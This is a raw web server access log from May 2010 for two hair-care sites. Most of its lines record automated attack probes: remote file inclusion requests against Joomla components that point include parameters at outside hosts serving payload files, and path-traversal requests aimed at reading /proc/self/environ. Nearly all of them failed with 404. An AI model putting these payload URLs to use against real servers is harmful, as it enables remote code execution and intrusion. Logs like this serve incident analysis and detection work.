66.246.72.178 - - [30/May/2010:18:54:34 -0700] "GET /logs/access_100510.log/components/com_extended_registration/registration_detailed.inc.php?mosConfig_absolute_path=http://1942.jp/pitbull2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:18:54:34 -0700] "GET /freehairsecretsphp/viewtopic.php?p=9328 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:18:59:21 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:18:59:21 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:18:59:21 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
188.126.88.79 - - [30/May/2010:19:01:40 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "growlonghairfast.com"
188.126.88.79 - - [30/May/2010:19:01:41 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; MRA 4.6 (build 01425); MRSPUTNIK 1, 5, 0, 19 SW)" "growlonghairfast.com"
119.63.193.129 - - [30/May/2010:19:02:32 -0700] "GET /robots.txt HTTP/1.1" 404 - "-" "Baiduspider+(+http://www.baidu.jp/spider/)" "freehairsecrets.com"
66.7.198.40 - - [30/May/2010:19:04:25 -0700] "GET /logs//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:19:04:25 -0700] "GET /logs/access_100125.log//administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
66.7.198.40 - - [30/May/2010:19:04:25 -0700] "GET /administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.boomong.com/bbs/data/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /logs/access.log//index3.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /index3.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /logs/access.log//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /logs//index3.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:36 -0700] "GET /logs//index2.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:45 -0700] "GET /logs/access.log//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:45 -0700] "GET /index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:04:45 -0700] "GET /logs//index.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /logs/access.log//index0.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /index0.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /logs//index0.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /logs/access.log//index1.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /index1.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
216.15.238.210 - - [30/May/2010:19:06:07 -0700] "GET /logs//index1.php?option=com_fabrik&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.79" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:19:06:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14531 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:08:52 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.167.25 - - [30/May/2010:19:08:52 -0700] "GET /logs/access.log//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.167.25 - - [30/May/2010:19:08:52 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
174.121.58.89 - - [30/May/2010:19:10:17 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.58.89 - - [30/May/2010:19:10:17 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
174.121.58.89 - - [30/May/2010:19:10:17 -0700] "GET /logs/access_100412.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.fuerzarh.com/1.txt??? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:10:47 -0700] "GET /logs/access_100412.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:10:47 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:10:47 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:11:37 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:11:37 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:11:37 -0700] "GET /logs/access_100125.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
92.241.190.214 - - [30/May/2010:19:11:40 -0700] "GET /assets/snippets/reflect/snippet.reflect.php?reflect_base=http://www.ausdvd.com/images/.log? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
62.44.82.61 - - [30/May/2010:19:11:41 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [30/May/2010:19:11:41 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [30/May/2010:19:11:41 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
62.44.82.61 - - [30/May/2010:19:12:09 -0700] "GET /logs/access_100412.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn/bbs//skin/zero_vote/fx29id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:12:25 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:12:28 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:12:29 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:12:56 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:12:56 -0700] "GET /logs/access_100503.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:12:56 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:13 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:13 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:13 -0700] "GET /logs/access_100412.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:13:42 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:13:42 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:13:43 -0700] "GET /admin_events.php?CONFIG_EXT[LANGUAGES_DIR]=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:13:49 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:59 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:59 -0700] "GET /logs/access_100125.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:13:59 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:14:08 -0700] "GET /logs/access_100412.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:14:16 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.103.197.43 - - [30/May/2010:19:14:16 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.103.197.43 - - [30/May/2010:19:14:16 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
118.129.167.25 - - [30/May/2010:19:14:21 -0700] "GET /logs/access_100412.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
77.88.25.28 - - [30/May/2010:19:14:36 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14661 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "www.freehairsecrets.com"
212.103.197.43 - - [30/May/2010:19:14:42 -0700] "GET /logs/access_100412.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:14:45 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:14:45 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:14:47 -0700] "GET /logs/access.log//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:58 -0700] "GET /logs/access_100104.log/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:58 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:58 -0700] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /logs/access_100104.log/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /logs/access_100104.log/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
208.43.48.82 - - [30/May/2010:19:14:59 -0700] "GET /logs/ImpExData.php?systempath=http://www.vincenttractors.co.uk/images/cache/id.jpg? HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
211.174.62.150 - - [30/May/2010:19:15:18 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [30/May/2010:19:15:18 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [30/May/2010:19:15:18 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
211.174.62.150 - - [30/May/2010:19:15:18 -0700] "GET /logs/access_100125.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://www.kortech.cn//bbs/id1.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:15:32 -0700] "GET /logs//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:15:32 -0700] "GET /components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:15:33 -0700] "GET /logs/access_100503.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:15:55 -0700] "GET /logs/access_100510.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:16:31 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:16:31 -0700] "GET /logs/access_100125.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:16:31 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:16:32 -0700] "GET /logs/access_100412.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:16:38 -0700] "GET /logs/access_100412.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:16:38 -0700] "GET /logs/access_100426.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:16:39 -0700] "GET /logs/access_100322.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
212.103.197.43 - - [30/May/2010:19:16:45 -0700] "GET /components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.103.197.43 - - [30/May/2010:19:16:45 -0700] "GET /logs//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
212.103.197.43 - - [30/May/2010:19:16:45 -0700] "GET /logs/access.log%20%20//components/com_dbquery/classes/DBQ/admin/common.class.php?mosConfig_absolute_path=http://dancingforcancer.com///g466/sc1?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
77.88.25.28 - - [30/May/2010:19:17:16 -0700] "GET /freehairsecretsphp/viewtopic.php?p=14563 HTTP/1.1" 200 349 "-" "Yandex/1.01.001 (compatible; Win16; I)" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:18:52 -0700] "GET /logs/access_100426.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
118.129.167.25 - - [30/May/2010:19:18:52 -0700] "GET /logs/access_100322.log%20%20//components/com_sitemap/sitemap.xml.php?mosConfig_absolute_path=http://dochoicuabe.info//tmp/1.gif?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
195.190.166.35 - - [30/May/2010:19:19:37 -0700] "GET /logs/access_100412.log%20/index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.1" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
195.190.166.35 - - [30/May/2010:19:19:37 -0700] "GET /index.php?_REQUEST=&_REQUEST[option]=com_extcalendar&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.galwayindependent.com/cache/id.txt??? HTTP/1.0" 404 - "-" "libwww-perl/5.65" "growlonghairfast.com"
